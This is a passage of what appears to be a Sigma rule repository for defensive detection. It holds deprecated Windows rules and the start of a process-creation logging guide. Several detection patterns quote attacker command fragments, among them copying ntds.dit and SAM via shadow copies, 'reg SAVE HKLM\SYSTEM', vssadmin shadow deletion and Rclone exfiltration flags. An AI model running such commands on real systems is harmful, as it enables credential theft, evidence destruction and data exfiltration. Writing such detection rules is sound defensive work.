4e8d5fd3-c959-441f-a941-f73d0cdcdca5 status: deprecated description: | Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. 
This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Sreeman date: 2020/09/29 modified: 2023/08/17 tags: - attack.defense_evasion - attack.persistence - attack.t1112 - attack.t1053 logsource: product: windows category: registry_set detection: selection: TargetObject|contains: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\' Details|endswith: - '.sh' - '.exe' - '.dll' - '.bin' - '.bat' - '.cmd' - '.js' - '.ps' - '.vb' - '.jar' - '.hta' - '.msi' - '.vbs' condition: selection fields: - EventID - CommandLine - TargetObject - Details falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/registry_set_add_hidden_user.yml ================================================ title: User Account Hidden By Registry id: 8a58209c-7ae6-4027-afb0-307a78e4589a status: deprecated description: Detect modification for a specific user to prevent that user from being listed on the logon screen references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md author: frack113 date: 2022/08/20 modified: 2023/08/17 tags: - attack.defense_evasion - attack.t1564.002 logsource: product: windows category: registry_set detection: selection: TargetObject|contains: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\' TargetObject|endswith: '$' Details: DWORD (0x00000000) condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/registry_set_creation_service_uncommon_folder.yml ================================================ title: Service Binary in Uncommon Folder id: 
c625c4c2-515d-407f-8bb6-456f65955669 status: deprecated description: Detects the creation of a service whose service binary is located in an uncommon directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: Florian Roth (Nextron Systems) date: 2022/05/02 modified: 2024/03/25 tags: - attack.defense_evasion - attack.t1112 logsource: category: registry_set product: windows detection: selection_1: TargetObject|startswith: 'HKLM\System\CurrentControlSet\Services\' TargetObject|endswith: '\Start' Image|contains: - '\AppData\Local\' - '\AppData\Roaming\' Details: - 'DWORD (0x00000000)' # boot - 'DWORD (0x00000001)' # System - 'DWORD (0x00000002)' # Automatic # 3 - Manual , 4 - Disabled selection_2: TargetObject|startswith: 'HKLM\System\CurrentControlSet\Services\' TargetObject|endswith: '\ImagePath' Details|contains: - '\AppData\Local\' - '\AppData\Roaming\' filter: - Image|contains: - '\AppData\Roaming\Zoom' - '\AppData\Local\Zoom' - Details|contains: - '\AppData\Roaming\Zoom' - '\AppData\Local\Zoom' condition: 1 of selection_* and not filter falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/registry_set_disable_microsoft_office_security_features.yml ================================================ title: Disable Microsoft Office Security Features id: 7c637634-c95d-4bbf-b26c-a82510874b34 status: deprecated description: Detects the disabling of Microsoft Office security features via the registry references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ - https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/ author: frack113 date: 2021/06/08 modified: 2023/08/17 tags: - attack.defense_evasion - attack.t1562.001 logsource:
product: windows category: registry_set definition: the listed registry keys must be added to the Sysmon configuration for this rule to work # Sysmon # \VBAWarnings # \DisableInternetFilesInPV # \DisableUnsafeLocationsInPV # \DisableAttachementsInPV detection: selection: TargetObject|contains: '\SOFTWARE\Microsoft\Office\' TargetObject|endswith: - VBAWarnings - DisableInternetFilesInPV - DisableUnsafeLocationsInPV - DisableAttachementsInPV Details: 'DWORD (0x00000001)' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/registry_set_malware_adwind.yml ================================================ title: Adwind RAT / JRAT - Registry id: 42f0e038-767e-4b85-9d96-2c6335bad0b5 related: - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 type: derived status: deprecated description: Detects javaw.exe in the AppData folder as used by Adwind / JRAT references: - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100 - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community date: 2017/11/10 modified: 2024/03/26 tags: - attack.execution - attack.t1059.005 - attack.t1059.007 logsource: category: registry_set product: windows detection: selection: TargetObject|startswith: 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' Details|startswith: '%AppData%\Roaming\Oracle\bin\' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/registry_set_office_security.yml ================================================ title: Office Security Settings Changed id: 9b894e57-033f-46cf-b7fa-a52804181973 status: deprecated description: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents.
(see references) references: - https://twitter.com/inversecos/status/1494174785621819397 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ - https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ author: Trent Liffick (@tliffick) date: 2020/05/22 modified: 2023/08/17 tags: - attack.defense_evasion - attack.t1112 logsource: category: registry_set product: windows detection: selection: TargetObject|endswith: - '\Security\Trusted Documents\TrustRecords' - '\Security\AccessVBOM' - '\Security\VBAWarnings' condition: selection falsepositives: - Valid Macros and/or internal documents level: high ================================================ FILE: deprecated/windows/registry_set_persistence_com_hijacking_susp_locations.yml ================================================ title: Potential Persistence Via COM Hijacking From Suspicious Locations id: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77 related: - id: 790317c0-0a36-4a6a-a105-6e576bf99a14 type: derived status: deprecated description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location. 
references: - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/28 modified: 2024/07/16 tags: - attack.persistence - attack.t1546.015 logsource: category: registry_set product: windows detection: selection: TargetObject|contains: '\CLSID\' TargetObject|endswith: - '\InprocServer32\(Default)' - '\LocalServer32\(Default)' Details|contains: # Add more suspicious paths and locations - '\AppData\Local\Temp\' - '\Desktop\' - '\Downloads\' - '\Microsoft\Windows\Start Menu\Programs\Startup\' - '\System32\spool\drivers\color\' # as seen in the knotweed blog - '\Users\Public\' - '\Windows\Temp\' - '%appdata%' - '%temp%' - '%tmp%' condition: selection falsepositives: - Probable legitimate applications. If you find these please add them to an exclusion list level: high ================================================ FILE: deprecated/windows/registry_set_persistence_search_order.yml ================================================ title: Potential Persistence Via COM Search Order Hijacking id: a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12 related: - id: 790317c0-0a36-4a6a-a105-6e576bf99a14 type: derived status: deprecated description: Detects potential COM object hijacking leveraging the COM Search Order references: - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020-04-14 modified: 2024-09-02 tags: - attack.persistence - attack.t1546.015 logsource: category: registry_set product: windows detection: selection: # Detect new COM servers in the user hive TargetObject|contains: '\CLSID\' TargetObject|endswith: '\InprocServer32\(Default)' filter_main_generic: Details|contains: # Exclude privileged directories and observed FPs - '%%systemroot%%\system32\' - '%%systemroot%%\SysWow64\' filter_main_onedrive: 
Details|contains: # Related To OneDrive - '\AppData\Local\Microsoft\OneDrive\' - '\FileCoAuthLib64.dll' - '\FileSyncShell64.dll' - '\FileSyncApi64.dll' filter_main_health_service: Image|endswith: ':\WINDOWS\system32\SecurityHealthService.exe' filter_main_teams: Details|contains|all: - '\AppData\Local\Microsoft\TeamsMeetingAddin\' - '\Microsoft.Teams.AddinLoader.dll' filter_main_dropbox: Details|contains|all: - '\AppData\Roaming\Dropbox\' - '\DropboxExt64.*.dll' filter_main_trend_micro: Details|endswith: 'TmopIEPlg.dll' # TrendMicro osce filter_main_update: Image|endswith: - ':\WINDOWS\system32\wuauclt.exe' - ':\WINDOWS\system32\svchost.exe' filter_main_defender: Image|contains: - ':\ProgramData\Microsoft\Windows Defender\Platform\' - ':\Program Files\Windows Defender\' Image|endswith: '\MsMpEng.exe' filter_main_nvidia: Details|contains: '\FileRepository\nvmdi.inf' filter_main_edge: Image|endswith: '\MicrosoftEdgeUpdateComRegisterShell64.exe' filter_main_dx: Image|endswith: ':\WINDOWS\SYSTEM32\dxdiag.exe' filter_main_python: Details|endswith: - ':\Windows\pyshellext.amd64.dll' - ':\Windows\pyshellext.dll' filter_main_bonjourlib: Details|endswith: - ':\Windows\system32\dnssdX.dll' - ':\Windows\SysWOW64\dnssdX.dll' filter_main_printextensionmanager: Details|endswith: ':\Windows\system32\spool\drivers\x64\3\PrintConfig.dll' filter_main_programfiles: Details|contains: - ':\Program Files\' - ':\Program Files (x86)\' filter_main_programdata: Details|contains: ':\ProgramData\Microsoft\' filter_main_gameservice: Details|contains: ':\WINDOWS\system32\GamingServicesProxy.dll' filter_main_poqexec: Image|endswith: ':\Windows\System32\poqexec.exe' Details|contains: ':\Windows\System32\Autopilot.dll' filter_main_sec_health_svc: Image|endswith: ':\Windows\system32\SecurityHealthService.exe' Details|contains: ':\Windows\System32\SecurityHealth' filter_main_inprocserver: Image|endswith: - ':\Windows\System32\poqexec.exe' - ':\Windows\System32\regsvr32.exe' TargetObject|endswith: 
'\InProcServer32\(Default)' condition: selection and not 1 of filter_main_* falsepositives: - Some installed utilities (e.g. OneDrive) may serve new COM objects at user-level level: medium ================================================ FILE: deprecated/windows/registry_set_silentprocessexit.yml ================================================ title: SilentProcessExit Monitor Registration id: c81fe886-cac0-4913-a511-2822d72ff505 status: deprecated description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process references: - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ author: Florian Roth (Nextron Systems) date: 2021/02/26 modified: 2023/08/17 tags: - attack.persistence - attack.t1546.012 logsource: category: registry_set product: windows detection: selection: TargetObject|contains: 'Microsoft\Windows NT\CurrentVersion\SilentProcessExit' Details|contains: 'MonitorProcess' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml ================================================ title: Accessing WinAPI in PowerShell for Credentials Dumping id: 3f07b9d1-2082-4c56-9277-613a621983cc status: deprecated description: Detects PowerShell accessing lsass.exe (Sysmon Event IDs 8 and 10) references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: oscd.community, Natalia Shornikova date: 2020/10/06 modified: 2022/12/18 tags: - attack.credential_access - attack.t1003.001 logsource: product: windows service: sysmon detection: selection: EventID: - 8 - 10 SourceImage|endswith: - '\powershell.exe' - '\pwsh.exe' TargetImage|endswith: '\lsass.exe' condition: selection falsepositives: - Unknown level: high
================================================ FILE: deprecated/windows/sysmon_dcom_iertutil_dll_hijack.yml ================================================ title: DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon id: e554f142-5cf3-4e55-ace9-a1b59e0def65 status: deprecated description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario. references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga date: 2020/10/12 modified: 2022/12/18 tags: - attack.lateral_movement - attack.t1021.002 - attack.t1021.003 logsource: product: windows service: sysmon detection: selection_one: EventID: 11 Image: System TargetFilename|endswith: '\Internet Explorer\iertutil.dll' selection_two: EventID: 7 Image|endswith: '\Internet Explorer\iexplore.exe' ImageLoaded|endswith: '\Internet Explorer\iertutil.dll' condition: 1 of selection_* falsepositives: - Unknown level: critical ================================================ FILE: deprecated/windows/sysmon_mimikatz_detection_lsass.yml ================================================ title: Mimikatz Detection LSASS Access id: 0d894093-71bc-43c3-8c4d-ecfc28dcf5d9 status: deprecated description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_INFORMATION "only old versions", 0x0010 PROCESS_VM_READ) references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html tags: - attack.t1003 - attack.s0002 - attack.credential_access - car.2019-04-004 author: Sherif Eldeeb date: 2017/10/18 
modified: 2022/04/11 logsource: product: windows category: process_access detection: selection: TargetImage|endswith: '\lsass.exe' GrantedAccess: - '0x1410' - '0x1010' - '0x410' filter: SourceImage|startswith: - 'C:\Program Files\WindowsApps\' - 'C:\Windows\System32\' SourceImage|endswith: '\GamingServices.exe' condition: selection and not filter fields: - ComputerName - User - SourceImage falsepositives: - Some security products access LSASS in this way. level: high ================================================ FILE: deprecated/windows/sysmon_powershell_execution_moduleload.yml ================================================ title: PowerShell Execution id: 867613fb-fa60-4497-a017-a82df74a172c description: Detects execution of PowerShell status: deprecated date: 2019/09/12 modified: 2021/11/05 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html tags: - attack.execution - attack.t1086 # an old one - attack.t1059.001 logsource: category: image_load product: windows detection: selection: Description: 'System.Management.Automation' ImageLoaded|contains: 'System.Management.Automation' condition: selection fields: - ComputerName - Image - ProcessID - ImageLoaded falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/sysmon_rclone_execution.yml ================================================ title: RClone Execution id: a0d63692-a531-4912-ad39-4393325b2a9c status: deprecated description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc tags: - attack.exfiltration - attack.t1567.002 author: Bhabesh Raj, Sittikorn S date: 2021/05/10 modified: 2022/04/11 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a - 
https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html fields: - CommandLine - ParentCommandLine - Details falsepositives: - Legitimate RClone use level: high logsource: category: process_creation product: windows detection: selection: Description: 'Rsync for cloud storage' selection2: CommandLine|contains|all: - '--config ' - '--no-check-certificate ' - ' copy ' selection3: Image|endswith: - '\rclone.exe' CommandLine|contains: - 'mega' - 'pcloud' - 'ftp' - '--progress' - '--ignore-existing' - '--auto-confirm' - '--transfers' - '--multi-thread-streams' condition: 1 of selection* ================================================ FILE: deprecated/windows/win_defender_disabled.yml ================================================ title: Windows Defender Threat Detection Disabled id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 status: deprecated description: Detects disabling Windows Defender threat protection references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/11/22 tags: - attack.defense_evasion - attack.t1562.001 logsource: product: windows service: windefend detection: selection: EventID: - 5001 # Real-time protection is disabled. - 5010 # Scanning for malware and other potentially unwanted software is disabled. - 5012 # Scanning for viruses is disabled. - 5101 # The antimalware platform is expired. 
condition: selection falsepositives: - Administrator actions (should be investigated) - Seen being triggered occasionally during Windows 8 Defender Updates level: high ================================================ FILE: deprecated/windows/win_dsquery_domain_trust_discovery.yml ================================================ title: Domain Trust Discovery id: 77815820-246c-47b8-9741-e0def3f57308 status: deprecated description: Detects a discovery of domain trusts. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md author: Jakob Weinzettl, oscd.community date: 2019/10/23 modified: 2023/02/04 tags: - attack.discovery - attack.t1482 logsource: category: process_creation product: windows detection: selection: - Image|endswith: '\dsquery.exe' CommandLine|contains|all: - '-filter' - 'trustedDomain' - Image|endswith: '\nltest.exe' CommandLine|contains: 'domain_trusts' condition: selection falsepositives: - Administration of systems. level: medium ================================================ FILE: deprecated/windows/win_lateral_movement_condrv.yml ================================================ title: Lateral Movement Indicator ConDrv id: 29d31aee-30f4-4006-85a9-a4a02d65306c status: deprecated #Too many FP description: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should be correlated with 4624 and 4688 for further intrusion context. 
author: Janantha Marasinghe date: 2021/04/27 modified: 2022/05/14 references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/wmiexec-vbs.htm - https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html tags: - attack.lateral_movement - attack.execution - attack.t1021 - attack.t1059 logsource: product: windows service: security detection: selection: EventID: 4674 ObjectServer: 'Security' ObjectType: 'File' ObjectName: '\Device\ConDrv' condition: selection falsepositives: - Legal admin action level: low ================================================ FILE: deprecated/windows/win_security_event_log_cleared.yml ================================================ title: Security Event Log Cleared id: a122ac13-daf8-4175-83a2-72c387be339d status: deprecated description: Checks for event id 1102 which indicates the security event log was cleared. references: - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml author: Saw Winn Naung date: 2021/08/15 modified: 2023/12/06 tags: - attack.t1070.001 logsource: service: security product: windows detection: selection: EventID: 1102 Provider_Name: Microsoft-Windows-Eventlog condition: selection falsepositives: - Legitimate administrative activity fields: - SubjectLogonId - SubjectUserName - SubjectUserSid - SubjectDomainName level: medium ================================================ FILE: deprecated/windows/win_security_group_modification_logging.yml ================================================ title: Group Modification Logging id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e status: deprecated description: | Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges. Sigma detects Event ID 4728 indicates a "Member is added to a Security Group". 
Event ID 4729 indicates a "Member is removed from a Security enabled-group". Event ID 4730 indicates a "Security Group is deleted". The case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP. references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728 - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729 - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730 - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633 - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632 - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634 author: Alexandr Yampolskyi, SOC Prime date: 2019/03/26 modified: 2023/04/26 # tags: # - CSC4 # - CSC4.8 # - NIST CSF 1.1 PR.AC-4 # - NIST CSF 1.1 PR.AT-2 # - NIST CSF 1.1 PR.MA-2 # - NIST CSF 1.1 PR.PT-3 # - ISO 27002-2013 A.9.1.1 # - ISO 27002-2013 A.9.2.2 # - ISO 27002-2013 A.9.2.3 # - ISO 27002-2013 A.9.2.4 # - ISO 27002-2013 A.9.2.5 # - ISO 27002-2013 A.9.2.6 # - ISO 27002-2013 A.9.3.1 # - ISO 27002-2013 A.9.4.1 # - ISO 27002-2013 A.9.4.2 # - ISO 27002-2013 A.9.4.3 # - ISO 27002-2013 A.9.4.4 # - PCI DSS 3.2 2.1 # - PCI DSS 3.2 7.1 # - PCI DSS 3.2 7.2 # - PCI DSS 3.2 7.3 # - PCI DSS 3.2 8.1 # - PCI DSS 3.2 8.2 # - PCI DSS 3.2 8.3 # - PCI DSS 3.2 8.7 logsource: product: windows service: security detection: selection: EventID: - 4728 # A member was added to a security-enabled global group - 4729 # A member was removed from a security-enabled global group - 4730 # A security-enabled global group was deleted - 633 # 
Security Enabled Global Group Member Removed - 632 # Security Enabled Global Group Member Added - 634 # Security Enabled Global Group Deleted condition: selection falsepositives: - Unknown level: low ================================================ FILE: deprecated/windows/win_security_lolbas_execution_of_nltest.yml ================================================ title: Correct Execution of Nltest.exe id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 status: deprecated description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm - https://attack.mitre.org/software/S0359/ author: Arun Chauhan date: 2021/10/04 modified: 2023/02/02 tags: - attack.discovery - attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc - attack.t1016 # enumerate the parent domain of a local machine using /parentdomain logsource: product: windows service: security detection: selection: EventID: 4689 ProcessName|endswith: 'nltest.exe' Status: '0x0' condition: selection fields: - 'SubjectUserName' - 'SubjectDomainName' falsepositives: - Red team activity - Rare legitimate use by an administrator level: high ================================================ FILE: deprecated/windows/win_security_windows_defender_exclusions_write_deleted.yml ================================================ title: Windows Defender Exclusion Deleted id: a33f8808-2812-4373-ae95-8cfb82134978 related: - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d type: derived - id: 46a68649-f218-4f86-aea1-16a759d81820 type: derived status: deprecated description: | Detects when a Windows Defender exclusion has been deleted. 
This could indicate an attacker trying to delete their tracks by removing the added exclusions references: - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ author: '@BarryShooshooga' date: 2019-10-26 modified: 2025-01-30 tags: - attack.defense-evasion - attack.t1562.001 logsource: product: windows service: security definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User' detection: selection: EventID: 4660 # An object was deleted. ObjectName|contains: '\Microsoft\Windows Defender\Exclusions\' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/win_susp_esentutl_activity.yml ================================================ title: Suspicious Esentutl Use id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7 status: deprecated description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. 
author: Florian Roth (Nextron Systems) date: 2020/05/23 modified: 2022/04/11 references: - https://lolbas-project.github.io/ - https://twitter.com/chadtilbury/status/1264226341408452610 tags: - attack.defense_evasion - attack.execution - attack.s0404 - attack.t1218 logsource: category: process_creation product: windows detection: selection: CommandLine|contains|all: - ' /vss ' - ' /y ' condition: selection fields: - CommandLine - ParentCommandLine falsepositives: - Administrative activity level: high ================================================ FILE: deprecated/windows/win_susp_rclone_exec.yml ================================================ title: Rclone Execution via Command Line or PowerShell id: cb7286ba-f207-44ab-b9e6-760d82b84253 description: Detects Rclone which is commonly used by ransomware groups for exfiltration status: deprecated date: 2021/05/26 modified: 2022/04/11 author: Aaron Greetham (@beardofbinary) - NCC Group references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ tags: - attack.exfiltration - attack.t1567.002 falsepositives: - Legitimate Rclone usage (rare) level: high logsource: product: windows category: process_creation detection: exec_selection: Image|endswith: '\rclone.exe' ParentImage|endswith: - '\PowerShell.exe' - '\cmd.exe' command_selection: CommandLine|contains: - ' pass ' - ' user ' - ' copy ' - ' mega ' - ' sync ' - ' config ' - ' lsd ' - ' remote ' - ' ls ' description_selection: Description: 'Rsync for cloud storage' condition: command_selection and ( description_selection or exec_selection ) ================================================ FILE: deprecated/windows/win_susp_vssadmin_ntds_activity.yml ================================================ title: Activity Related to NTDS.dit Domain Hash Retrieval id: b932b60f-fdda-4d53-8eda-a170c1d97bbd status: deprecated description: Detects suspicious commands that could be related to activity that uses volume shadow copy to 
steal and retrieve hashes from the NTDS.dit file remotely author: Florian Roth (Nextron Systems), Michael Haag date: 2019/01/16 modified: 2022/04/11 references: - https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/ - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/ - https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/ - https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/ - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ tags: - attack.credential_access - attack.t1003 logsource: category: process_creation product: windows detection: selection: CommandLine: - 'vssadmin.exe Delete Shadows' - 'vssadmin create shadow /for=C:' - 'copy \\?\GLOBALROOT\Device\\*\windows\ntds\ntds.dit' - 'copy \\?\GLOBALROOT\Device\\*\config\SAM' - 'vssadmin delete shadows /for=C:' - 'reg SAVE HKLM\SYSTEM ' - 'esentutl.exe /y /vss *\ntds.dit*' - 'esentutl.exe /y /vss *\SAM' - 'esentutl.exe /y /vss *\SYSTEM' condition: selection fields: - CommandLine - ParentCommandLine falsepositives: - Administrative activity level: high ================================================ FILE: deprecated/windows/win_system_service_install_susp_double_ampersand.yml ================================================ title: New Service Uses Double Ampersand in Path id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 status: deprecated description: Detects a service installation that uses a suspicious double ampersand used in the image path value references: - Internal Research author: Florian Roth (Nextron Systems) date: 2022/07/05 modified: 2023/11/15 tags: - attack.defense_evasion - attack.t1027 logsource: product: windows service: system detection: selection: Provider_Name: 'Service Control Manager' EventID: 7045 ImagePath|contains: '&&' condition: selection falsepositives: - Unknown level: high 
================================================ FILE: deprecated/windows/win_system_susp_sam_dump.yml ================================================ title: SAM Dump to AppData id: 839dd1e8-eda8-4834-8145-01beeee33acd status: deprecated description: Detects suspicious SAM dump activity as caused by QuarksPwDump and other password dumpers author: Florian Roth (Nextron Systems) date: 2018/01/27 modified: 2024/01/18 tags: - attack.credential_access - attack.t1003.002 logsource: product: windows service: system definition: The source of this type of event is Kernel-General detection: selection: Provider_Name: Microsoft-Windows-Kernel-General EventID: 16 keywords: '|all': - '\AppData\Local\Temp\SAM-' - '.dmp' condition: selection and keywords falsepositives: - Unknown level: high ================================================ FILE: documentation/README.md ================================================ ================================================ FILE: documentation/logsource-guides/other/antivirus.md ================================================ **Coming Soon** ================================================ FILE: documentation/logsource-guides/windows/category/process_creation.md ================================================ # category: process_creation ID: 2ff912e8-159f-4789-a2ef-761292b32a23 ## Content
Expand - [category: process\_creation](#category-process_creation) - [Content](#content) - [Description](#description) - [Event Source(s)](#event-sources) - [Logging Setup](#logging-setup) - [Microsoft Windows Security Auditing](#microsoft-windows-security-auditing) - [Process Creation](#process-creation) - [Include Command-Line In Process Creation Events](#include-command-line-in-process-creation-events) - [Microsoft-Windows-Sysmon](#microsoft-windows-sysmon) - [Process Creation](#process-creation-1) - [Event Fields](#event-fields) - [Provider: Microsoft Windows Security Auditing / EventID: 4688](#provider-microsoft-windows-security-auditing--eventid-4688) - [Provider: Microsoft-Windows-Sysmon / EventID: 1](#provider-microsoft-windows-sysmon--eventid-1)
## Description This logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `process_creation` category. ## Event Source(s) This section describes the event source(s) that are required to be collected in order to receive the events used by the `process_creation` category detection rules ```yml Provider: Microsoft Windows Security Auditing GUID: {54849625-5478-4994-a5ba-3e3b0328c30d} Channel: Security EventID: 4688 ``` ```yml Provider: Microsoft-Windows-Sysmon GUID: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Channel: Microsoft-Windows-Sysmon/Operational EventID: 1 ``` ## Logging Setup This section describes how to setup logging in your environment ### Microsoft Windows Security Auditing #### Process Creation - Subcategory GUID: `{0CCE922B-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High` - EventID(s): - `4688` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Detailed Tracking - Audit Process Creation - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
